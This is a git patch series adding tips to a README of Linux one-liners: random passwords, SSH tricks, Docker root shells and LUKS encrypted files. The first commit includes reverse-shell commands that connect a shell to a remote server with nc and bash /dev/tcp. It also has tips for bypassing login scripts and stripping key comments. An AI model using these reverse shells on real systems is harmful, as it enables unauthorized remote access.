From 6bcc53e51628a4652c489758dae66abd18d92875 Mon Sep 17 00:00:00 2001 From: "[ virtual snow ]" <59495119+virtualsnow@users.noreply.github.com> Date: Fri, 24 Jan 2020 00:26:18 -0800 Subject: [PATCH 1/3] Update README.md --- README.md | 70 +++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 70 insertions(+) diff --git a/README.md b/README.md index 8fc0dbb..a9178b1 100644 --- a/README.md +++ b/README.md @@ -253,6 +253,76 @@ Make a noise (BING) when anyone tries to SSH into our system (could be an admin! # tcpdump -nlq "tcp[13] == 2 and dst port 22" | while read x; do echo "${x}"; echo -en \\a; done ``` +**20. Generate quick random hex** + +Good for quick passwords without human element. + +``` +$ openssl rand -base64 24 +``` + +**21. Reverse shell with nc** + +First listen for a shell on your server. + +``` +$ nc -lvp 666 +``` + +Reverse connect with netcat. + +``` +$ nc -e /bin/sh yourserver.com 666 +``` + +Reverse connect with netcat built without `-e` flag. + +``` +$ mkfifo /tmp/x;cat /tmp/x|/bin/sh -i 2>&1|nc yourserver.com 666 >/tmp/x +``` + +**22. Reverse shell with bash** + +Replace `xx.xx.xx.xx` with your server ip. + +``` +$ bash -i >& /dev/tcp/xx.xx.xx.xx/666 0>&1 +``` + +**23. SSH with different shell + +Bypass events that exist in login scripts such as `.profile` and `.bashrc`. + +``` +$ ssh user@server sh + +``` + +**24. Strip SSH key comment field. + +`ssh-keygen` automatically fills this field with local user and host, and can be recorded during connection. + +Command strips comment field from both private and public keys. + +``` +$ ssh-keygen -c -C "redacted" -f ~/.ssh/id_rsa +``` + +**25. Get a root shell in Docker container. + +If the container is already running: + +``` +$ docker exec -it --user root /bin/bash +``` + +If the container is not running: + +``` +$ docker run -it --user root --entrypoint /bin/bash +``` + + -------------------------------------------------------------------------- Shoutz: ADM From 2648e14515d0e77d8ad67a0950107be9b1a01bc5 Mon Sep 17 00:00:00 2001 From: "[ virtual snow ]" <59495119+virtualsnow@users.noreply.github.com> Date: Fri, 24 Jan 2020 00:27:49 -0800 Subject: [PATCH 2/3] Update README.md --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index a9178b1..2f3391b 100644 --- a/README.md +++ b/README.md @@ -289,7 +289,7 @@ Replace `xx.xx.xx.xx` with your server ip. $ bash -i >& /dev/tcp/xx.xx.xx.xx/666 0>&1 ``` -**23. SSH with different shell +**23. SSH with different shell** Bypass events that exist in login scripts such as `.profile` and `.bashrc`. @@ -298,7 +298,7 @@ $ ssh user@server sh ``` -**24. Strip SSH key comment field. +**24. Strip SSH key comment field.** `ssh-keygen` automatically fills this field with local user and host, and can be recorded during connection. @@ -308,7 +308,7 @@ Command strips comment field from both private and public keys. $ ssh-keygen -c -C "redacted" -f ~/.ssh/id_rsa ``` -**25. Get a root shell in Docker container. +**25. Get a root shell in Docker container.** If the container is already running: From bf16cccee67d078c40b1f2c86973d8fd4ed66bde Mon Sep 17 00:00:00 2001 From: "[ virtual snow ]" <59495119+virtualsnow@users.noreply.github.com> Date: Fri, 24 Jan 2020 00:54:47 -0800 Subject: [PATCH 3/3] file luks tricks --- README.md | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) diff --git a/README.md b/README.md index 2f3391b..08b2cbf 100644 --- a/README.md +++ b/README.md @@ -322,6 +322,34 @@ If the container is not running: $ docker run -it --user root --entrypoint /bin/bash ``` +**26. Linux transportable encrypted filesystems.** + +Like truecrypt but better. You may need to `losetup -f` to get a loop device. + +Make a junk file, here 256MB is used, encrypt, and partition. You will be prompted for a password. + +``` +$ dd if=/dev/urandom of=/tmp/crypted bs=1M count=256 iflag=fullblock +$ cryptsetup luksFormat /tmp/crypted +$ mkfs.ext3 /tmp/crypted +``` + +Mount: + +``` +# losetup /dev/loop0 /tmp/crypted +# cryptsetup open /dev/loop0 crypted +# mount -t ext3 /dev/mapper/crypted /mnt/crypted +``` + +Store data in `/mnt/crypted`, then unmount: + +``` +# umount /mnt/crypted +# cryptsetup close crypted +# losetup -d /dev/loop0 +``` + --------------------------------------------------------------------------